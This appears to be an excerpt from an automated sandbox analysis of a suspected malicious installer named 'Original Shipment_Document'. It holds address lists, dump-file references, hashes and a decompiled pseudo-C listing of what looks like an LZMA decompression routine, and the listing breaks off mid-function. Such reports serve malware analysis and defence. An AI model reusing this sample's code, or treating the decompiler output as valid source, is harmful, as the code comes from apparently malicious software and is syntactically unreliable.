                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00406ef5
                                                0x00406ef5
                                                0x00406ef8
                                                0x00000000
                                                0x00000000
                                                0x00407234
                                                0x00407234
                                                0x00407238
                                                0x0040725a
                                                0x0040725a
                                                0x0040725d
                                                0x00407267
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040723a
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407244
                                                0x00407247
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00407328
                                                0x00407328
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x0040733c
                                                0x004072f7
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e2
                                                0x004073e5
                                                0x004072e6
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x004072ec
                                                0x00000000
                                                0x0040701c
                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x0040733c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407061
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fa
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000
                                                0x00407499
                                                0x004072e6
                                                0x00407366
                                                0x0040732f

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                                                • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00407234() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
